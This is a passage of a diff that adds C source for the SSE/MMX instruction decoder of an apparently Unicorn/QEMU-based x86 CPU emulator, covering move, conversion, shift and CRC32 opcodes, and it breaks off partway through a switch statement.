SSEFunc_0_eppi sse_fn_eppi; + SSEFunc_0_ppi sse_fn_ppi; + SSEFunc_0_eppt sse_fn_eppt; + TCGMemOp ot; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_ptr cpu_env = tcg_ctx->cpu_env; + TCGv_ptr cpu_ptr0 = tcg_ctx->cpu_ptr0; + TCGv_ptr cpu_ptr1 = tcg_ctx->cpu_ptr1; + TCGv_i32 cpu_tmp2_i32 = tcg_ctx->cpu_tmp2_i32; + TCGv_i32 cpu_tmp3_i32 = tcg_ctx->cpu_tmp3_i32; + TCGv_i64 cpu_tmp1_i64 = tcg_ctx->cpu_tmp1_i64; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv cpu_cc_dst = *(TCGv *)tcg_ctx->cpu_cc_dst; + TCGv cpu_cc_src = *(TCGv *)tcg_ctx->cpu_cc_src; + TCGv cpu_cc_src2 = *(TCGv *)tcg_ctx->cpu_cc_src2; + TCGv cpu_tmp0 = *(TCGv *)tcg_ctx->cpu_tmp0; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + TCGv **cpu_regs = (TCGv **)tcg_ctx->cpu_regs; + + b &= 0xff; + if (s->prefix & PREFIX_DATA) + b1 = 1; + else if (s->prefix & PREFIX_REPZ) + b1 = 2; + else if (s->prefix & PREFIX_REPNZ) + b1 = 3; + else + b1 = 0; + sse_fn_epp = sse_op_table1[b][b1]; + if (!sse_fn_epp) { + goto illegal_op; + } + if ((b <= 0x5f && b >= 0x10) || b == 0xc6 || b == 0xc2) { + is_xmm = 1; + } else { + if (b1 == 0) { + /* MMX case */ + is_xmm = 0; + } else { + is_xmm = 1; + } + } + /* simple MMX/SSE operation */ + if (s->flags & HF_TS_MASK) { + gen_exception(s, EXCP07_PREX, pc_start - s->cs_base); + return; + } + if (s->flags & HF_EM_MASK) { + illegal_op: + gen_exception(s, EXCP06_ILLOP, pc_start - s->cs_base); + return; + } + if (is_xmm && !(s->flags & HF_OSFXSR_MASK)) + if ((b != 0x38 && b != 0x3a) || (s->prefix & PREFIX_DATA)) + goto illegal_op; + if (b == 0x0e) { + if (!(s->cpuid_ext2_features & CPUID_EXT2_3DNOW)) + goto illegal_op; + /* femms */ + gen_helper_emms(tcg_ctx, cpu_env); + return; + } + if (b == 0x77) { + /* emms */ + gen_helper_emms(tcg_ctx, cpu_env); + return; + } + /* prepare MMX state (XXX: optimize by storing fptt and fptags in + the static cpu state) */ + if (!is_xmm) { + gen_helper_enter_mmx(tcg_ctx, cpu_env); + } + + modrm = cpu_ldub_code(env, s->pc++); + reg = ((modrm >> 3) & 7); + if (is_xmm) + reg |= rex_r; + mod = (modrm >> 6) & 3; + if (sse_fn_epp == SSE_SPECIAL) { + b |= (b1 << 8); + switch(b) { + case 0x0e7: /* movntq */ + if (mod == 3) + goto illegal_op; + gen_lea_modrm(env, s, modrm); + gen_stq_env_A0(s, offsetof(CPUX86State, fpregs[reg].mmx)); + break; + case 0x1e7: /* movntdq */ + case 0x02b: /* movntps */ + case 0x12b: /* movntps */ + if (mod == 3) + goto illegal_op; + gen_lea_modrm(env, s, modrm); + gen_sto_env_A0(s, offsetof(CPUX86State, xmm_regs[reg])); + break; + case 0x3f0: /* lddqu */ + if (mod == 3) + goto illegal_op; + gen_lea_modrm(env, s, modrm); + gen_ldo_env_A0(s, offsetof(CPUX86State, xmm_regs[reg])); + break; + case 0x22b: /* movntss */ + case 0x32b: /* movntsd */ + if (mod == 3) + goto illegal_op; + gen_lea_modrm(env, s, modrm); + if (b1 & 1) { + gen_stq_env_A0(s, offsetof(CPUX86State, + xmm_regs[reg].XMM_Q(0))); + } else { + tcg_gen_ld32u_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State, + xmm_regs[reg].XMM_L(0))); + gen_op_st_v(s, MO_32, *cpu_T[0], cpu_A0); + } + break; + case 0x6e: /* movd mm, ea */ +#ifdef TARGET_X86_64 + if (s->dflag == MO_64) { + gen_ldst_modrm(env, s, modrm, MO_64, OR_TMP0, 0); + tcg_gen_st_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State,fpregs[reg].mmx)); + } else +#endif + { + gen_ldst_modrm(env, s, modrm, MO_32, OR_TMP0, 0); + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr0, cpu_env, + offsetof(CPUX86State,fpregs[reg].mmx)); + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_T[0]); + gen_helper_movl_mm_T0_mmx(tcg_ctx, cpu_ptr0, cpu_tmp2_i32); + } + break; + case 0x16e: /* movd xmm, ea */ +#ifdef TARGET_X86_64 + if (s->dflag == MO_64) { + gen_ldst_modrm(env, s, modrm, MO_64, OR_TMP0, 0); + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr0, cpu_env, + offsetof(CPUX86State,xmm_regs[reg])); + gen_helper_movq_mm_T0_xmm(tcg_ctx, cpu_ptr0, *cpu_T[0]); + } else +#endif + { + gen_ldst_modrm(env, s, modrm, MO_32, OR_TMP0, 0); + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr0, cpu_env, + offsetof(CPUX86State,xmm_regs[reg])); + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_T[0]); + gen_helper_movl_mm_T0_xmm(tcg_ctx, cpu_ptr0, cpu_tmp2_i32); + } + break; + case 0x6f: /* movq mm, ea */ + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + gen_ldq_env_A0(s, offsetof(CPUX86State, fpregs[reg].mmx)); + } else { + rm = (modrm & 7); + tcg_gen_ld_i64(tcg_ctx, cpu_tmp1_i64, cpu_env, + offsetof(CPUX86State,fpregs[rm].mmx)); + tcg_gen_st_i64(tcg_ctx, cpu_tmp1_i64, cpu_env, + offsetof(CPUX86State,fpregs[reg].mmx)); + } + break; + case 0x010: /* movups */ + case 0x110: /* movupd */ + case 0x028: /* movaps */ + case 0x128: /* movapd */ + case 0x16f: /* movdqa xmm, ea */ + case 0x26f: /* movdqu xmm, ea */ + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + gen_ldo_env_A0(s, offsetof(CPUX86State, xmm_regs[reg])); + } else { + rm = (modrm & 7) | REX_B(s); + gen_op_movo(tcg_ctx, offsetof(CPUX86State,xmm_regs[reg]), + offsetof(CPUX86State,xmm_regs[rm])); + } + break; + case 0x210: /* movss xmm, ea */ + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + gen_op_ld_v(s, MO_32, *cpu_T[0], cpu_A0); + tcg_gen_st32_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State,xmm_regs[reg].XMM_L(0))); + tcg_gen_movi_tl(tcg_ctx, *cpu_T[0], 0); + tcg_gen_st32_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State,xmm_regs[reg].XMM_L(1))); + tcg_gen_st32_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State,xmm_regs[reg].XMM_L(2))); + tcg_gen_st32_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State,xmm_regs[reg].XMM_L(3))); + } else { + rm = (modrm & 7) | REX_B(s); + gen_op_movl(tcg_ctx, offsetof(CPUX86State,xmm_regs[reg].XMM_L(0)), + offsetof(CPUX86State,xmm_regs[rm].XMM_L(0))); + } + break; + case 0x310: /* movsd xmm, ea */ + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + gen_ldq_env_A0(s, offsetof(CPUX86State, + xmm_regs[reg].XMM_Q(0))); + tcg_gen_movi_tl(tcg_ctx, *cpu_T[0], 0); + tcg_gen_st32_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State,xmm_regs[reg].XMM_L(2))); + tcg_gen_st32_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State,xmm_regs[reg].XMM_L(3))); + } else { + rm = (modrm & 7) | REX_B(s); + gen_op_movq(tcg_ctx, offsetof(CPUX86State,xmm_regs[reg].XMM_Q(0)), + offsetof(CPUX86State,xmm_regs[rm].XMM_Q(0))); + } + break; + case 0x012: /* movlps */ + case 0x112: /* movlpd */ + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + gen_ldq_env_A0(s, offsetof(CPUX86State, + xmm_regs[reg].XMM_Q(0))); + } else { + /* movhlps */ + rm = (modrm & 7) | REX_B(s); + gen_op_movq(tcg_ctx, offsetof(CPUX86State,xmm_regs[reg].XMM_Q(0)), + offsetof(CPUX86State,xmm_regs[rm].XMM_Q(1))); + } + break; + case 0x212: /* movsldup */ + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + gen_ldo_env_A0(s, offsetof(CPUX86State, xmm_regs[reg])); + } else { + rm = (modrm & 7) | REX_B(s); + gen_op_movl(tcg_ctx, offsetof(CPUX86State,xmm_regs[reg].XMM_L(0)), + offsetof(CPUX86State,xmm_regs[rm].XMM_L(0))); + gen_op_movl(tcg_ctx, offsetof(CPUX86State,xmm_regs[reg].XMM_L(2)), + offsetof(CPUX86State,xmm_regs[rm].XMM_L(2))); + } + gen_op_movl(tcg_ctx, offsetof(CPUX86State,xmm_regs[reg].XMM_L(1)), + offsetof(CPUX86State,xmm_regs[reg].XMM_L(0))); + gen_op_movl(tcg_ctx, offsetof(CPUX86State,xmm_regs[reg].XMM_L(3)), + offsetof(CPUX86State,xmm_regs[reg].XMM_L(2))); + break; + case 0x312: /* movddup */ + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + gen_ldq_env_A0(s, offsetof(CPUX86State, + xmm_regs[reg].XMM_Q(0))); + } else { + rm = (modrm & 7) | REX_B(s); + gen_op_movq(tcg_ctx, offsetof(CPUX86State,xmm_regs[reg].XMM_Q(0)), + offsetof(CPUX86State,xmm_regs[rm].XMM_Q(0))); + } + gen_op_movq(tcg_ctx, offsetof(CPUX86State,xmm_regs[reg].XMM_Q(1)), + offsetof(CPUX86State,xmm_regs[reg].XMM_Q(0))); + break; + case 0x016: /* movhps */ + case 0x116: /* movhpd */ + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + gen_ldq_env_A0(s, offsetof(CPUX86State, + xmm_regs[reg].XMM_Q(1))); + } else { + /* movlhps */ + rm = (modrm & 7) | REX_B(s); + gen_op_movq(tcg_ctx, offsetof(CPUX86State,xmm_regs[reg].XMM_Q(1)), + offsetof(CPUX86State,xmm_regs[rm].XMM_Q(0))); + } + break; + case 0x216: /* movshdup */ + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + gen_ldo_env_A0(s, offsetof(CPUX86State, xmm_regs[reg])); + } else { + rm = (modrm & 7) | REX_B(s); + gen_op_movl(tcg_ctx, offsetof(CPUX86State,xmm_regs[reg].XMM_L(1)), + offsetof(CPUX86State,xmm_regs[rm].XMM_L(1))); + gen_op_movl(tcg_ctx, offsetof(CPUX86State,xmm_regs[reg].XMM_L(3)), + offsetof(CPUX86State,xmm_regs[rm].XMM_L(3))); + } + gen_op_movl(tcg_ctx, offsetof(CPUX86State,xmm_regs[reg].XMM_L(0)), + offsetof(CPUX86State,xmm_regs[reg].XMM_L(1))); + gen_op_movl(tcg_ctx, offsetof(CPUX86State,xmm_regs[reg].XMM_L(2)), + offsetof(CPUX86State,xmm_regs[reg].XMM_L(3))); + break; + case 0x178: + case 0x378: + { + int bit_index, field_length; + + if (b1 == 1 && reg != 0) + goto illegal_op; + field_length = cpu_ldub_code(env, s->pc++) & 0x3F; + bit_index = cpu_ldub_code(env, s->pc++) & 0x3F; + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr0, cpu_env, + offsetof(CPUX86State,xmm_regs[reg])); + if (b1 == 1) + gen_helper_extrq_i(tcg_ctx, cpu_env, cpu_ptr0, + tcg_const_i32(tcg_ctx, bit_index), + tcg_const_i32(tcg_ctx, field_length)); + else + gen_helper_insertq_i(tcg_ctx, cpu_env, cpu_ptr0, + tcg_const_i32(tcg_ctx, bit_index), + tcg_const_i32(tcg_ctx, field_length)); + } + break; + case 0x7e: /* movd ea, mm */ +#ifdef TARGET_X86_64 + if (s->dflag == MO_64) { + tcg_gen_ld_i64(tcg_ctx, *cpu_T[0], cpu_env, + offsetof(CPUX86State,fpregs[reg].mmx)); + gen_ldst_modrm(env, s, modrm, MO_64, OR_TMP0, 1); + } else +#endif + { + tcg_gen_ld32u_tl(tcg_ctx, *cpu_T[0], cpu_env, + offsetof(CPUX86State,fpregs[reg].mmx.MMX_L(0))); + gen_ldst_modrm(env, s, modrm, MO_32, OR_TMP0, 1); + } + break; + case 0x17e: /* movd ea, xmm */ +#ifdef TARGET_X86_64 + if (s->dflag == MO_64) { + tcg_gen_ld_i64(tcg_ctx, *cpu_T[0], cpu_env, + offsetof(CPUX86State,xmm_regs[reg].XMM_Q(0))); + gen_ldst_modrm(env, s, modrm, MO_64, OR_TMP0, 1); + } else +#endif + { + tcg_gen_ld32u_tl(tcg_ctx, *cpu_T[0], cpu_env, + offsetof(CPUX86State,xmm_regs[reg].XMM_L(0))); + gen_ldst_modrm(env, s, modrm, MO_32, OR_TMP0, 1); + } + break; + case 0x27e: /* movq xmm, ea */ + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + gen_ldq_env_A0(s, offsetof(CPUX86State, + xmm_regs[reg].XMM_Q(0))); + } else { + rm = (modrm & 7) | REX_B(s); + gen_op_movq(tcg_ctx, offsetof(CPUX86State,xmm_regs[reg].XMM_Q(0)), + offsetof(CPUX86State,xmm_regs[rm].XMM_Q(0))); + } + gen_op_movq_env_0(tcg_ctx, offsetof(CPUX86State,xmm_regs[reg].XMM_Q(1))); + break; + case 0x7f: /* movq ea, mm */ + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + gen_stq_env_A0(s, offsetof(CPUX86State, fpregs[reg].mmx)); + } else { + rm = (modrm & 7); + gen_op_movq(tcg_ctx, offsetof(CPUX86State,fpregs[rm].mmx), + offsetof(CPUX86State,fpregs[reg].mmx)); + } + break; + case 0x011: /* movups */ + case 0x111: /* movupd */ + case 0x029: /* movaps */ + case 0x129: /* movapd */ + case 0x17f: /* movdqa ea, xmm */ + case 0x27f: /* movdqu ea, xmm */ + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + gen_sto_env_A0(s, offsetof(CPUX86State, xmm_regs[reg])); + } else { + rm = (modrm & 7) | REX_B(s); + gen_op_movo(tcg_ctx, offsetof(CPUX86State,xmm_regs[rm]), + offsetof(CPUX86State,xmm_regs[reg])); + } + break; + case 0x211: /* movss ea, xmm */ + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + tcg_gen_ld32u_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State,xmm_regs[reg].XMM_L(0))); + gen_op_st_v(s, MO_32, *cpu_T[0], cpu_A0); + } else { + rm = (modrm & 7) | REX_B(s); + gen_op_movl(tcg_ctx, offsetof(CPUX86State,xmm_regs[rm].XMM_L(0)), + offsetof(CPUX86State,xmm_regs[reg].XMM_L(0))); + } + break; + case 0x311: /* movsd ea, xmm */ + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + gen_stq_env_A0(s, offsetof(CPUX86State, + xmm_regs[reg].XMM_Q(0))); + } else { + rm = (modrm & 7) | REX_B(s); + gen_op_movq(tcg_ctx, offsetof(CPUX86State,xmm_regs[rm].XMM_Q(0)), + offsetof(CPUX86State,xmm_regs[reg].XMM_Q(0))); + } + break; + case 0x013: /* movlps */ + case 0x113: /* movlpd */ + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + gen_stq_env_A0(s, offsetof(CPUX86State, + xmm_regs[reg].XMM_Q(0))); + } else { + goto illegal_op; + } + break; + case 0x017: /* movhps */ + case 0x117: /* movhpd */ + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + gen_stq_env_A0(s, offsetof(CPUX86State, + xmm_regs[reg].XMM_Q(1))); + } else { + goto illegal_op; + } + break; + case 0x71: /* shift mm, im */ + case 0x72: + case 0x73: + case 0x171: /* shift xmm, im */ + case 0x172: + case 0x173: + if (b1 >= 2) { + goto illegal_op; + } + val = cpu_ldub_code(env, s->pc++); + if (is_xmm) { + tcg_gen_movi_tl(tcg_ctx, *cpu_T[0], val); + tcg_gen_st32_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State,xmm_t0.XMM_L(0))); + tcg_gen_movi_tl(tcg_ctx, *cpu_T[0], 0); + tcg_gen_st32_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State,xmm_t0.XMM_L(1))); + op1_offset = offsetof(CPUX86State,xmm_t0); + } else { + tcg_gen_movi_tl(tcg_ctx, *cpu_T[0], val); + tcg_gen_st32_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State,mmx_t0.MMX_L(0))); + tcg_gen_movi_tl(tcg_ctx, *cpu_T[0], 0); + tcg_gen_st32_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State,mmx_t0.MMX_L(1))); + op1_offset = offsetof(CPUX86State,mmx_t0); + } + sse_fn_epp = sse_op_table2[((b - 1) & 3) * 8 + + (((modrm >> 3)) & 7)][b1]; + if (!sse_fn_epp) { + goto illegal_op; + } + if (is_xmm) { + rm = (modrm & 7) | REX_B(s); + op2_offset = offsetof(CPUX86State,xmm_regs[rm]); + } else { + rm = (modrm & 7); + op2_offset = offsetof(CPUX86State,fpregs[rm].mmx); + } + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr0, cpu_env, op2_offset); + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr1, cpu_env, op1_offset); + sse_fn_epp(tcg_ctx, cpu_env, cpu_ptr0, cpu_ptr1); + break; + case 0x050: /* movmskps */ + rm = (modrm & 7) | REX_B(s); + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr0, cpu_env, + offsetof(CPUX86State,xmm_regs[rm])); + gen_helper_movmskps(tcg_ctx, cpu_tmp2_i32, cpu_env, cpu_ptr0); + tcg_gen_extu_i32_tl(tcg_ctx, *cpu_regs[reg], cpu_tmp2_i32); + break; + case 0x150: /* movmskpd */ + rm = (modrm & 7) | REX_B(s); + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr0, cpu_env, + offsetof(CPUX86State,xmm_regs[rm])); + gen_helper_movmskpd(tcg_ctx, cpu_tmp2_i32, cpu_env, cpu_ptr0); + tcg_gen_extu_i32_tl(tcg_ctx, *cpu_regs[reg], cpu_tmp2_i32); + break; + case 0x02a: /* cvtpi2ps */ + case 0x12a: /* cvtpi2pd */ + gen_helper_enter_mmx(tcg_ctx, cpu_env); + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + op2_offset = offsetof(CPUX86State,mmx_t0); + gen_ldq_env_A0(s, op2_offset); + } else { + rm = (modrm & 7); + op2_offset = offsetof(CPUX86State,fpregs[rm].mmx); + } + op1_offset = offsetof(CPUX86State,xmm_regs[reg]); + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr0, cpu_env, op1_offset); + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr1, cpu_env, op2_offset); + switch(b >> 8) { + case 0x0: + gen_helper_cvtpi2ps(tcg_ctx, cpu_env, cpu_ptr0, cpu_ptr1); + break; + default: + case 0x1: + gen_helper_cvtpi2pd(tcg_ctx, cpu_env, cpu_ptr0, cpu_ptr1); + break; + } + break; + case 0x22a: /* cvtsi2ss */ + case 0x32a: /* cvtsi2sd */ + ot = mo_64_32(s->dflag); + gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); + op1_offset = offsetof(CPUX86State,xmm_regs[reg]); + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr0, cpu_env, op1_offset); + if (ot == MO_32) { + SSEFunc_0_epi sse_fn_epi = sse_op_table3ai[(b >> 8) & 1]; + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_T[0]); + sse_fn_epi(tcg_ctx, cpu_env, cpu_ptr0, cpu_tmp2_i32); + } else { +#ifdef TARGET_X86_64 + SSEFunc_0_epl sse_fn_epl = sse_op_table3aq[(b >> 8) & 1]; + sse_fn_epl(tcg_ctx, cpu_env, cpu_ptr0, *cpu_T[0]); +#else + goto illegal_op; +#endif + } + break; + case 0x02c: /* cvttps2pi */ + case 0x12c: /* cvttpd2pi */ + case 0x02d: /* cvtps2pi */ + case 0x12d: /* cvtpd2pi */ + gen_helper_enter_mmx(tcg_ctx, cpu_env); + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + op2_offset = offsetof(CPUX86State,xmm_t0); + gen_ldo_env_A0(s, op2_offset); + } else { + rm = (modrm & 7) | REX_B(s); + op2_offset = offsetof(CPUX86State,xmm_regs[rm]); + } + op1_offset = offsetof(CPUX86State,fpregs[reg & 7].mmx); + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr0, cpu_env, op1_offset); + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr1, cpu_env, op2_offset); + switch(b) { + case 0x02c: + gen_helper_cvttps2pi(tcg_ctx, cpu_env, cpu_ptr0, cpu_ptr1); + break; + case 0x12c: + gen_helper_cvttpd2pi(tcg_ctx, cpu_env, cpu_ptr0, cpu_ptr1); + break; + case 0x02d: + gen_helper_cvtps2pi(tcg_ctx, cpu_env, cpu_ptr0, cpu_ptr1); + break; + case 0x12d: + gen_helper_cvtpd2pi(tcg_ctx, cpu_env, cpu_ptr0, cpu_ptr1); + break; + } + break; + case 0x22c: /* cvttss2si */ + case 0x32c: /* cvttsd2si */ + case 0x22d: /* cvtss2si */ + case 0x32d: /* cvtsd2si */ + ot = mo_64_32(s->dflag); + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + if ((b >> 8) & 1) { + gen_ldq_env_A0(s, offsetof(CPUX86State, xmm_t0.XMM_Q(0))); + } else { + gen_op_ld_v(s, MO_32, *cpu_T[0], cpu_A0); + tcg_gen_st32_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State,xmm_t0.XMM_L(0))); + } + op2_offset = offsetof(CPUX86State,xmm_t0); + } else { + rm = (modrm & 7) | REX_B(s); + op2_offset = offsetof(CPUX86State,xmm_regs[rm]); + } + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr0, cpu_env, op2_offset); + if (ot == MO_32) { + SSEFunc_i_ep sse_fn_i_ep = + sse_op_table3bi[((b >> 7) & 2) | (b & 1)]; + sse_fn_i_ep(tcg_ctx, cpu_tmp2_i32, cpu_env, cpu_ptr0); + tcg_gen_extu_i32_tl(tcg_ctx, *cpu_T[0], cpu_tmp2_i32); + } else { +#ifdef TARGET_X86_64 + SSEFunc_l_ep sse_fn_l_ep = + sse_op_table3bq[((b >> 7) & 2) | (b & 1)]; + sse_fn_l_ep(tcg_ctx, *cpu_T[0], cpu_env, cpu_ptr0); +#else + goto illegal_op; +#endif + } + gen_op_mov_reg_v(tcg_ctx, ot, reg, *cpu_T[0]); + break; + case 0xc4: /* pinsrw */ + case 0x1c4: + s->rip_offset = 1; + gen_ldst_modrm(env, s, modrm, MO_16, OR_TMP0, 0); + val = cpu_ldub_code(env, s->pc++); + if (b1) { + val &= 7; + tcg_gen_st16_tl(tcg_ctx, *cpu_T[0], cpu_env, + offsetof(CPUX86State,xmm_regs[reg].XMM_W(val))); + } else { + val &= 3; + tcg_gen_st16_tl(tcg_ctx, *cpu_T[0], cpu_env, + offsetof(CPUX86State,fpregs[reg].mmx.MMX_W(val))); + } + break; + case 0xc5: /* pextrw */ + case 0x1c5: + if (mod != 3) + goto illegal_op; + ot = mo_64_32(s->dflag); + val = cpu_ldub_code(env, s->pc++); + if (b1) { + val &= 7; + rm = (modrm & 7) | REX_B(s); + tcg_gen_ld16u_tl(tcg_ctx, *cpu_T[0], cpu_env, + offsetof(CPUX86State,xmm_regs[rm].XMM_W(val))); + } else { + val &= 3; + rm = (modrm & 7); + tcg_gen_ld16u_tl(tcg_ctx, *cpu_T[0], cpu_env, + offsetof(CPUX86State,fpregs[rm].mmx.MMX_W(val))); + } + reg = ((modrm >> 3) & 7) | rex_r; + gen_op_mov_reg_v(tcg_ctx, ot, reg, *cpu_T[0]); + break; + case 0x1d6: /* movq ea, xmm */ + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + gen_stq_env_A0(s, offsetof(CPUX86State, + xmm_regs[reg].XMM_Q(0))); + } else { + rm = (modrm & 7) | REX_B(s); + gen_op_movq(tcg_ctx, offsetof(CPUX86State,xmm_regs[rm].XMM_Q(0)), + offsetof(CPUX86State,xmm_regs[reg].XMM_Q(0))); + gen_op_movq_env_0(tcg_ctx, offsetof(CPUX86State,xmm_regs[rm].XMM_Q(1))); + } + break; + case 0x2d6: /* movq2dq */ + gen_helper_enter_mmx(tcg_ctx, cpu_env); + rm = (modrm & 7); + gen_op_movq(tcg_ctx, offsetof(CPUX86State,xmm_regs[reg].XMM_Q(0)), + offsetof(CPUX86State,fpregs[rm].mmx)); + gen_op_movq_env_0(tcg_ctx, offsetof(CPUX86State,xmm_regs[reg].XMM_Q(1))); + break; + case 0x3d6: /* movdq2q */ + gen_helper_enter_mmx(tcg_ctx, cpu_env); + rm = (modrm & 7) | REX_B(s); + gen_op_movq(tcg_ctx, offsetof(CPUX86State,fpregs[reg & 7].mmx), + offsetof(CPUX86State,xmm_regs[rm].XMM_Q(0))); + break; + case 0xd7: /* pmovmskb */ + case 0x1d7: + if (mod != 3) + goto illegal_op; + if (b1) { + rm = (modrm & 7) | REX_B(s); + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr0, cpu_env, offsetof(CPUX86State,xmm_regs[rm])); + gen_helper_pmovmskb_xmm(tcg_ctx, cpu_tmp2_i32, cpu_env, cpu_ptr0); + } else { + rm = (modrm & 7); + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr0, cpu_env, offsetof(CPUX86State,fpregs[rm].mmx)); + gen_helper_pmovmskb_mmx(tcg_ctx, cpu_tmp2_i32, cpu_env, cpu_ptr0); + } + reg = ((modrm >> 3) & 7) | rex_r; + tcg_gen_extu_i32_tl(tcg_ctx, *cpu_regs[reg], cpu_tmp2_i32); + break; + + case 0x138: + case 0x038: + b = modrm; + if ((b & 0xf0) == 0xf0) { + goto do_0f_38_fx; + } + modrm = cpu_ldub_code(env, s->pc++); + rm = modrm & 7; + reg = ((modrm >> 3) & 7) | rex_r; + mod = (modrm >> 6) & 3; + if (b1 >= 2) { + goto illegal_op; + } + + sse_fn_epp = sse_op_table6[b].op[b1]; + if (!sse_fn_epp) { + goto illegal_op; + } + if (!(s->cpuid_ext_features & sse_op_table6[b].ext_mask)) + goto illegal_op; + + if (b1) { + op1_offset = offsetof(CPUX86State,xmm_regs[reg]); + if (mod == 3) { + op2_offset = offsetof(CPUX86State,xmm_regs[rm | REX_B(s)]); + } else { + op2_offset = offsetof(CPUX86State,xmm_t0); + gen_lea_modrm(env, s, modrm); + switch (b) { + case 0x20: case 0x30: /* pmovsxbw, pmovzxbw */ + case 0x23: case 0x33: /* pmovsxwd, pmovzxwd */ + case 0x25: case 0x35: /* pmovsxdq, pmovzxdq */ + gen_ldq_env_A0(s, op2_offset + + offsetof(XMMReg, XMM_Q(0))); + break; + case 0x21: case 0x31: /* pmovsxbd, pmovzxbd */ + case 0x24: case 0x34: /* pmovsxwq, pmovzxwq */ + tcg_gen_qemu_ld_i32(s->uc, cpu_tmp2_i32, cpu_A0, + s->mem_index, MO_LEUL); + tcg_gen_st_i32(tcg_ctx, cpu_tmp2_i32, cpu_env, op2_offset + + offsetof(XMMReg, XMM_L(0))); + break; + case 0x22: case 0x32: /* pmovsxbq, pmovzxbq */ + tcg_gen_qemu_ld_tl(s->uc, cpu_tmp0, cpu_A0, + s->mem_index, MO_LEUW); + tcg_gen_st16_tl(tcg_ctx, cpu_tmp0, cpu_env, op2_offset + + offsetof(XMMReg, XMM_W(0))); + break; + case 0x2a: /* movntqda */ + gen_ldo_env_A0(s, op1_offset); + return; + default: + gen_ldo_env_A0(s, op2_offset); + } + } + } else { + op1_offset = offsetof(CPUX86State,fpregs[reg].mmx); + if (mod == 3) { + op2_offset = offsetof(CPUX86State,fpregs[rm].mmx); + } else { + op2_offset = offsetof(CPUX86State,mmx_t0); + gen_lea_modrm(env, s, modrm); + gen_ldq_env_A0(s, op2_offset); + } + } + if (sse_fn_epp == SSE_SPECIAL) { + goto illegal_op; + } + + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr0, cpu_env, op1_offset); + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr1, cpu_env, op2_offset); + sse_fn_epp(tcg_ctx, cpu_env, cpu_ptr0, cpu_ptr1); + + if (b == 0x17) { + set_cc_op(s, CC_OP_EFLAGS); + } + break; + + case 0x238: + case 0x338: + do_0f_38_fx: + /* Various integer extensions at 0f 38 f[0-f]. */ + b = modrm | (b1 << 8); + modrm = cpu_ldub_code(env, s->pc++); + reg = ((modrm >> 3) & 7) | rex_r; + + switch (b) { + case 0x3f0: /* crc32 Gd,Eb */ + case 0x3f1: /* crc32 Gd,Ey */ + do_crc32: + if (!(s->cpuid_ext_features & CPUID_EXT_SSE42)) { + goto illegal_op; + } + if ((b & 0xff) == 0xf0) { + ot = MO_8; + } else if (s->dflag != MO_64) { + ot = (s->prefix & PREFIX_DATA ? MO_16 : MO_32); + } else { + ot = MO_64; + } + + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_regs[reg]); + gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); + gen_helper_crc32(tcg_ctx, *cpu_T[0], cpu_tmp2_i32, + *cpu_T[0], tcg_const_i32(tcg_ctx, 8 << ot)); + + ot = mo_64_32(s->dflag); + gen_op_mov_reg_v(tcg_ctx, ot, reg, *cpu_T[0]); + break; + + case 0x1f0: /* crc32 or movbe */ + case 